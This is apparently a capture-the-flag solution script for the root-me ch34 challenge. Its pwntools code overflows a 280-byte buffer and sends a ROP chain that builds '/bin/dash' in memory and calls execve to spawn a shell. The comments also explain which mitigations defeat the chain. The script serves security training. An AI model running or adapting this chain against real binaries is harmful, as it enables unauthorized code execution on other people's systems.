#!/usr/bin/env python2
# execve generated by ROPgadget
#
# Solution script for the root-me "app-systeme" challenge binary ch34.  A
# fixed-size overflow (280 bytes of padding) overwrites the saved return
# address with a ROP chain that ends in an execve syscall.  Every gadget is
# referenced by an absolute address (0x40xxxx), which presumably means the
# target is a non-PIE binary - confirm against the binary.  From a defensive
# standpoint this chain as written is defeated by any of: PIE+ASLR (addresses
# would need a leak), a stack canary (the 280-byte overwrite would be caught
# before the return), or a hardware shadow stack / CET.  The payload shape -
# a long run of 'A' followed by many repeated 8-byte words - is also an easy
# thing to flag in traffic or core-dump triage.

from pwn import *
from struct import pack

# DEBUG=1 runs a local copy of the binary; otherwise the script attaches to
# the challenge host over SSH using the challenge account published by root-me.
DEBUG = 1
if DEBUG:
    proc = process('./ch34')
else:
    s = ssh(host='challenge03.root-me.org',
            user='app-systeme-ch34',
            password='app-systeme-ch34',
            port=2223)
    proc = s.process('./ch34')

# Padding goes here
# 280 bytes of filler reach the saved return address; everything appended
# after this is consumed as a sequence of return addresses / popped values.
p = 'A'*280

# Stage 1: build the NUL-terminated string "////////bin/dash" in .data
# (a writable page at a fixed address), 8 bytes per write.  Each write pops
# the destination into rsi and the 8 bytes into rax, then executes
# `mov [rsi], rax`.  The leading slashes pad "bin/dash" to exactly 16 bytes
# so no partial-word write is needed.
p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
p += pack('<Q', 0x00000000006c0000) # @ .data
p += pack('<Q', 0x000000000044d2b4) # pop rax ; ret
p += '////////'
p += pack('<Q', 0x0000000000467b51) # mov qword ptr [rsi], rax ; ret

p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
p += pack('<Q', 0x00000000006c0008) # @ .data + 8
p += pack('<Q', 0x000000000044d2b4) # pop rax ; ret
p += 'bin/dash'
p += pack('<Q', 0x0000000000467b51) # mov qword ptr [rsi], rax ; ret
# Third write stores rax == 0 at .data + 16: the string's NUL terminator.
p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
p += pack('<Q', 0x00000000006c0010) # @ .data + 16
p += pack('<Q', 0x000000000041bd9f) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000467b51) # mov qword ptr [rsi], rax ; ret
# Stage 2: set up the execve arguments per the x86-64 syscall ABI:
# rdi = pathname (.data), rsi = argv (NULL), rdx = envp (NULL).
# p64(0) from pwntools is the same 8-byte little-endian encoding as
# pack('<Q', 0); the two spellings are mixed here but equivalent.
p += pack('<Q', 0x00000000004016d3) # pop rdi ; ret
p += pack('<Q', 0x00000000006c0000) # @ .data
p += pack('<Q', 0x00000000004017e7) # pop rsi ; ret
p += p64(0)
p += pack('<Q', 0x0000000000437205) # pop rdx ; ret
p += p64(0)
# Stage 3: rax = 59 (x86-64 execve).  ROPgadget found no usable `pop rax`
# path for the syscall number, so it zeroes rax and applies `add rax, 1`
# 59 times - hence the long repeated run below.
p += pack('<Q', 0x000000000041bd9f) # xor rax, rax ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
p += pack('<Q', 0x000000000045aa10) # add rax, 1 ; ret
# Stage 4: issue the syscall with rax/rdi/rsi/rdx set up above.
p += pack('<Q', 0x000000000045b525) # syscall ; ret

# Left commented out: uncomment to attach gdb to the target before the
# payload is sent (useful for checking the 280-byte offset and the .data
# writes in the debugger).
# gdb.attach(proc)
# sendline appends '\n' to the payload; the chain itself ends at the syscall.
proc.sendline(p)
proc.interactive()